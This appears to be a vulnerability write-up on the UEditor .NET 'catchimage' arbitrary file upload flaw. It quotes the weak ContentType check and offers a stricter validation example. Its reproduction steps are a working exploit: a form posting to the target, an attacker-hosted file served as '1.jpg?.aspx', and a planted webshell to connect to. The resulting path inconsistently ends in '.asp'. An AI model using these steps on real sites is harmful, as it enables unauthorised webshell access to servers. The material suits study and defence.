Arbitrary file upload vulnerability in UEditor .Net version
1. Vulnerability introduction
UEditor is a website editor developed by Baidu; it no longer receives follow-up development or updates. The vulnerability exists only in the .NET version of the editor.
The cause of the vulnerability is that only the ContentType is checked when obtaining image resources, so the check can be bypassed to upload arbitrary files.
The only check the Crawler method performs on source[] is on the ContentType:
if (response.ContentType.IndexOf("image") == -1)
{
    State = "Url is not an image";
    return this;
}
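A stricter check than the ContentType test above, as an added example (not UEditor's code): it ignores both the remote ContentType and the URL, identifies the image type from the first bytes of the downloaded body, and chooses the stored file name itself. The class and method names are hypothetical, and it assumes the fetched body is available as a byte array.

```csharp
using System;
using System.Linq;

// Hypothetical helper, not part of UEditor: decide the stored file type from
// the downloaded bytes instead of the remote ContentType header or the URL.
public static class RemoteImageValidator
{
    // Leading bytes ("magic numbers") of the image formats that are accepted.
    private static readonly (string Ext, byte[] Magic)[] Allowed =
    {
        (".jpg", new byte[] { 0xFF, 0xD8, 0xFF }),
        (".png", new byte[] { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A }),
        (".gif", new byte[] { 0x47, 0x49, 0x46, 0x38 }), // "GIF8"
    };

    // Returns true and a server-chosen file name when the body starts like an
    // allowed image; nothing from the caller-supplied URL is reused in the name.
    public static bool TryBuildStoredName(byte[] body, out string storedName)
    {
        storedName = null;
        if (body == null) return false;
        foreach (var (ext, magic) in Allowed)
        {
            if (body.Length >= magic.Length && body.Take(magic.Length).SequenceEqual(magic))
            {
                storedName = Guid.NewGuid().ToString("N") + ext;
                return true;
            }
        }
        return false;
    }

    public static void Main()
    {
        // Constructed sample bodies: a PNG header, and text that a server could label "image/jpeg".
        byte[] png = { 0x89, 0x50, 0x4E, 0x47, 0x0D, 0x0A, 0x1A, 0x0A, 0x00 };
        byte[] text = System.Text.Encoding.ASCII.GetBytes("<%@ Page Language=\"C#\" %>");

        Console.WriteLine(TryBuildStoredName(png, out var a) ? "accepted as " + a : "rejected");
        Console.WriteLine(TryBuildStoredName(text, out var b) ? "accepted as " + b : "rejected");
    }
}
```

The part that matters most is that the extension comes from a fixed allowlist and never from the request, so a body that passes the byte check is still stored under an image extension.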
2. Reproducing the vulnerability
1. Use the POST method to upload a file directly to the target website:
<form action="http://IP:port/ueditor/net/controller.ashx?action=catchimage" enctype="application/x-www-form-urlencoded" method="POST">
    <p>shell addr:<input type="text" name="source[]" /></p>
    <input type="submit" value="Submit"/>
</form>
2. Generate a picture file:
1.jpg
3. Start the web service:
python -m SimpleHTTPServer 8888
4. Enter the address http://XXXX:8888/1.jpg?.aspx in the "shell addr" field
5. The upload succeeds
6. Pony address
http://ip:port/ueditor/net/upload/image/20201127/6374211044232448561123135.asp
7. Connect to Pony